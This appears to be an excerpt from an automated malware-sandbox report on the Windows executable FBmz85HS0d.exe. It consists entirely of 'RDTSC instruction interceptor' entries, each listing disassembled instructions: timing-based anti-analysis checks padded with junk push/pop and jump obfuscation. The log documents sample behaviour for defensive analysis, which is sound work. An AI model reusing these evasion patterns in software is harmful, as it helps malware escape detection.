                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 587333 second address: 587339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5863D4 second address: 5863D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5863D9 second address: 5863E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5863E4 second address: 586427 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F4EF0C79888h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4EF0C79898h 0x0000001c jmp 00007F4EF0C79894h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586583 second address: 586589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586589 second address: 58658D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58658D second address: 586591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586721 second address: 586735 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4EF0C79886h 0x00000008 jno 00007F4EF0C79886h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586F14 second address: 586F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4EF0C09E16h 0x0000000a ja 00007F4EF0C09E16h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F4EF0C09E29h 0x0000001b push edi 0x0000001c ja 00007F4EF0C09E16h 0x00000022 pop edi 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B616 second address: 58B61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B66C second address: 58B670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B670 second address: 58B699 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124674AFh], edi 0x00000010 mov dx, si 0x00000013 push 00000004h 0x00000015 clc 0x00000016 sub dx, 4D17h 0x0000001b call 00007F4EF0C79889h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B699 second address: 58B6FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4EF0C09E29h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F4EF0C09E24h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4EF0C09E22h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B6FA second address: 58B72B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4EF0C7988Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F4EF0C7988Dh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B960 second address: 58B9C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F4EF0C09E16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F4EF0C09E18h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push dword ptr [ebp+12455F54h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F4EF0C09E18h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 ja 00007F4EF0C09E1Ch 0x0000004d push C08624F7h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push esi 0x00000057 pop esi 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B9C8 second address: 58B9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B9D9 second address: 58B9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B9DF second address: 58B9E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58D1DB second address: 58D1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AD426 second address: 4AD43A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C7988Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50354 second address: 4F5035A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F5035A second address: 4F50372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, C5D3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50372 second address: 4F50377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50377 second address: 4F503CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4EF0C79896h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F4EF0C79890h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4EF0C79897h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F503CF second address: 4F503FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4EF0C09E1Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F7064E second address: 4F70654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70654 second address: 4F70663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70663 second address: 4F70680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70680 second address: 4F706A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, A0h 0x00000011 mov dx, si 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F706A1 second address: 4F706B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F706B1 second address: 4F706BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F706BD second address: 4F70762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4EF0C79895h 0x0000000c sub eax, 0B0AC756h 0x00000012 jmp 00007F4EF0C79891h 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], esi 0x0000001c pushad 0x0000001d mov al, B2h 0x0000001f mov cx, di 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-04h] 0x00000026 jmp 00007F4EF0C7988Bh 0x0000002b nop 0x0000002c jmp 00007F4EF0C79896h 0x00000031 push eax 0x00000032 jmp 00007F4EF0C7988Bh 0x00000037 nop 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F4EF0C79894h 0x0000003f sbb cx, 6E38h 0x00000044 jmp 00007F4EF0C7988Bh 0x00000049 popfd 0x0000004a mov di, ax 0x0000004d popad 0x0000004e push dword ptr [ebp+08h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70762 second address: 4F70766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70766 second address: 4F7077D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79893h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F707A5 second address: 4F707C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F4EF0C09E29h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F707C4 second address: 4F707D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4EF0C7988Ch 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F707D6 second address: 4F70818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 cmp dword ptr [ebp-04h], 00000000h 0x0000000b pushad 0x0000000c mov ebx, 13EEB4A0h 0x00000011 mov edi, 109A7ACCh 0x00000016 popad 0x00000017 mov esi, eax 0x00000019 pushad 0x0000001a movsx ebx, si 0x0000001d movzx esi, dx 0x00000020 popad 0x00000021 je 00007F4EF0C09E92h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4EF0C09E27h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70818 second address: 4F7081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F7081C second address: 4F70822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70822 second address: 4F70828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70828 second address: 4F7082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70851 second address: 4F70855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70855 second address: 4F7085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F7085B second address: 4F708CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4EF0C7988Ch 0x00000008 pop eax 0x00000009 jmp 00007F4EF0C7988Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, esi 0x00000013 pushad 0x00000014 jmp 00007F4EF0C7988Bh 0x00000019 popad 0x0000001a pop esi 0x0000001b pushad 0x0000001c pushad 0x0000001d mov esi, 006F4511h 0x00000022 jmp 00007F4EF0C7988Eh 0x00000027 popad 0x00000028 jmp 00007F4EF0C79892h 0x0000002d popad 0x0000002e leave 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F4EF0C79897h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F708CC second address: 4F60020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F4EF0C09E12h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F4EF0C09E17h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F4EF589740Bh 0x0000002a mov edi, edi 0x0000002c pushad 0x0000002d jmp 00007F4EF0C09E1Ch 0x00000032 mov ax, 9DE1h 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 mov di, cx 0x0000003c push eax 0x0000003d push edx 0x0000003e mov ecx, 1C849BDBh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60020 second address: 4F60053 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4EF0C79890h 0x00000008 and cx, 3DA8h 0x0000000d jmp 00007F4EF0C7988Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov cx, 3C31h 0x0000001e movzx eax, di 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60053 second address: 4F600B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4EF0C09E26h 0x00000009 sbb esi, 15722B38h 0x0000000f jmp 00007F4EF0C09E1Bh 0x00000014 popfd 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushad 0x0000001e mov edx, esi 0x00000020 call 00007F4EF0C09E1Ah 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov esi, edi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4EF0C09E26h 0x00000034 mov dx, si 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F600B8 second address: 4F600C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F600C6 second address: 4F600CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F600CA second address: 4F600DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F600DB second address: 4F600F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F600F3 second address: 4F601A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 pushfd 0x00000006 jmp 00007F4EF0C7988Ah 0x0000000b jmp 00007F4EF0C79895h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 mov ax, C683h 0x0000001a mov ax, 47DFh 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F4EF0C79895h 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 pop edi 0x00000029 mov ecx, 6E711ADBh 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F4EF0C7988Ch 0x00000037 sbb ax, 10A8h 0x0000003c jmp 00007F4EF0C7988Bh 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F4EF0C79898h 0x00000048 or cx, 0308h 0x0000004d jmp 00007F4EF0C7988Bh 0x00000052 popfd 0x00000053 popad 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F4EF0C79894h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F601DA second address: 4F601DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F601DE second address: 4F601E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F601E4 second address: 4F601EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F601EA second address: 4F601EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F601EE second address: 4F60223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a jmp 00007F4EF0C09E23h 0x0000000f sub edi, edi 0x00000011 jmp 00007F4EF0C09E1Fh 0x00000016 inc ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60223 second address: 4F60229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60229 second address: 4F60264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f pushfd 0x00000010 jmp 00007F4EF0C09E28h 0x00000015 adc esi, 2E230218h 0x0000001b jmp 00007F4EF0C09E1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60350 second address: 4F60356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60356 second address: 4F6035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F6035A second address: 4F6038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4EF0C79898h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F6038B second address: 4F6038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F6038F second address: 4F60395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60395 second address: 4F603DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F4F61707EFBh 0x0000000f jmp 00007F4EF0C09E20h 0x00000014 js 00007F4EF0C09E77h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4EF0C09E27h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F603DC second address: 4F603E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F603E2 second address: 4F603E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F603E6 second address: 4F6042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007F4EF0C79897h 0x00000010 jne 00007F4F61777919h 0x00000016 jmp 00007F4EF0C79896h 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F6042D second address: 4F60431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60431 second address: 4F60437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60437 second address: 4F60484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov cl, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4EF0C09E1Bh 0x00000017 sub cx, 575Eh 0x0000001c jmp 00007F4EF0C09E29h 0x00000021 popfd 0x00000022 jmp 00007F4EF0C09E20h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60484 second address: 4F604D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 5Dh 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4EF0C79892h 0x00000012 jmp 00007F4EF0C79895h 0x00000017 popfd 0x00000018 mov di, si 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4EF0C79898h 0x00000024 rdtsc
